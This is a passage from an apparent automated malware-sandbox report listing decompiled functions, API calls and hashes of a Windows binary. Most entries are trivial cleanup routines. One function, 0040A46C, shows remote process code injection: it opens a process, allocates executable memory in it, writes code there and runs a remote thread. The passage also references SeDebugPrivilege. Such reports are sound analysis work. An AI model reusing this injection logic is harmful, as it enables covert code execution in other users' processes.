                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1294909896-123907689
                                                                                                                                                                                                                          • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                                                                          • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                                                                                                                          0x004054bc
                                                                                                                                                                                                                          0x004054c4
                                                                                                                                                                                                                          0x004054cd
                                                                                                                                                                                                                          0x004054cf
                                                                                                                                                                                                                          0x004054d2
                                                                                                                                                                                                                          0x004054d5
                                                                                                                                                                                                                          0x004054d8
                                                                                                                                                                                                                          0x004054db
                                                                                                                                                                                                                          0x004054de

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                                                                          • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                                                                          • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                                                                                                                          0x00408f4c
                                                                                                                                                                                                                          0x00408f57
                                                                                                                                                                                                                          0x00408f60
                                                                                                                                                                                                                          0x00408f62
                                                                                                                                                                                                                          0x00408f67
                                                                                                                                                                                                                          0x00408f67
                                                                                                                                                                                                                          0x00408f71

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 187924719-0
                                                                                                                                                                                                                          • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                                                                                          0x004098fa
                                                                                                                                                                                                                          0x004098fc
                                                                                                                                                                                                                          0x00409901
                                                                                                                                                                                                                          0x00409907
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040991c
                                                                                                                                                                                                                          0x00409918
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                                                                                                                          0x004095da
                                                                                                                                                                                                                          0x004095da
                                                                                                                                                                                                                          0x004095de
                                                                                                                                                                                                                          0x004095e1
                                                                                                                                                                                                                          0x004095e7
                                                                                                                                                                                                                          0x004095e7
                                                                                                                                                                                                                          0x004095ee
                                                                                                                                                                                                                          0x004095fc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                                                                          • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                                                                                                                          0x0040a3d0
                                                                                                                                                                                                                          0x0040a3d9

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                                                                          • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                                                                                                                                          0x004055d1
                                                                                                                                                                                                                          0x004055d1
                                                                                                                                                                                                                          0x004055d5
                                                                                                                                                                                                                          0x004055da
                                                                                                                                                                                                                          0x004055df
                                                                                                                                                                                                                          0x004055e3
                                                                                                                                                                                                                          0x004055e4
                                                                                                                                                                                                                          0x004055e8
                                                                                                                                                                                                                          0x004055eb

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                                                                                                                          • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                                                                                                                          0x0040a474
                                                                                                                                                                                                                          0x0040a47b
                                                                                                                                                                                                                          0x0040a48a
                                                                                                                                                                                                                          0x0040a48d
                                                                                                                                                                                                                          0x0040a48f
                                                                                                                                                                                                                          0x0040a497
                                                                                                                                                                                                                          0x0040a49a
                                                                                                                                                                                                                          0x0040a6f7
                                                                                                                                                                                                                          0x0040a6f9
                                                                                                                                                                                                                          0x0040a700
                                                                                                                                                                                                                          0x0040a700
                                                                                                                                                                                                                          0x0040a4ad
                                                                                                                                                                                                                          0x0040a4b3
                                                                                                                                                                                                                          0x0040a4b8
                                                                                                                                                                                                                          0x0040a4c6
                                                                                                                                                                                                                          0x0040a4cc
                                                                                                                                                                                                                          0x0040a4cf
                                                                                                                                                                                                                          0x0040a4dd
                                                                                                                                                                                                                          0x0040a4e2
                                                                                                                                                                                                                          0x0040a4e3
                                                                                                                                                                                                                          0x0040a4ea
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4ec
                                                                                                                                                                                                                          0x0040a4f6
                                                                                                                                                                                                                          0x0040a4fe
                                                                                                                                                                                                                          0x0040a503
                                                                                                                                                                                                                          0x0040a504
                                                                                                                                                                                                                          0x0040a50b
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a50d
                                                                                                                                                                                                                          0x0040a512
                                                                                                                                                                                                                          0x0040a518
                                                                                                                                                                                                                          0x0040a51c
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a528
                                                                                                                                                                                                                          0x0040a537
                                                                                                                                                                                                                          0x0040a54c
                                                                                                                                                                                                                          0x0040a539
                                                                                                                                                                                                                          0x0040a544
                                                                                                                                                                                                                          0x0040a549
                                                                                                                                                                                                                          0x0040a558
                                                                                                                                                                                                                          0x0040a56d
                                                                                                                                                                                                                          0x0040a55a
                                                                                                                                                                                                                          0x0040a565
                                                                                                                                                                                                                          0x0040a56a
                                                                                                                                                                                                                          0x0040a579
                                                                                                                                                                                                                          0x0040a591
                                                                                                                                                                                                                          0x0040a57b
                                                                                                                                                                                                                          0x0040a589
                                                                                                                                                                                                                          0x0040a58e
                                                                                                                                                                                                                          0x0040a5b4
                                                                                                                                                                                                                          0x0040a5b7
                                                                                                                                                                                                                          0x0040a5cc
                                                                                                                                                                                                                          0x0040a5cf
                                                                                                                                                                                                                          0x0040a5d4
                                                                                                                                                                                                                          0x0040a5d7
                                                                                                                                                                                                                          0x0040a6ed
                                                                                                                                                                                                                          0x0040a5e5
                                                                                                                                                                                                                          0x0040a5fa
                                                                                                                                                                                                                          0x0040a60b
                                                                                                                                                                                                                          0x0040a61a
                                                                                                                                                                                                                          0x0040a620
                                                                                                                                                                                                                          0x0040a623
                                                                                                                                                                                                                          0x0040a62b
                                                                                                                                                                                                                          0x0040a62f
                                                                                                                                                                                                                          0x0040a632
                                                                                                                                                                                                                          0x0040a659
                                                                                                                                                                                                                          0x0040a634
                                                                                                                                                                                                                          0x0040a635
                                                                                                                                                                                                                          0x0040a641
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a668
                                                                                                                                                                                                                          0x0040a66e
                                                                                                                                                                                                                          0x0040a685
                                                                                                                                                                                                                          0x0040a69e
                                                                                                                                                                                                                          0x0040a6a8
                                                                                                                                                                                                                          0x0040a6ad
                                                                                                                                                                                                                          0x0040a6bd
                                                                                                                                                                                                                          0x0040a6c5
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d0
                                                                                                                                                                                                                          0x0040a6d1
                                                                                                                                                                                                                          0x0040a6d2
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A4B3
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                                                                          • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1572607441-20550370
                                                                                                                                                                                                                          • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
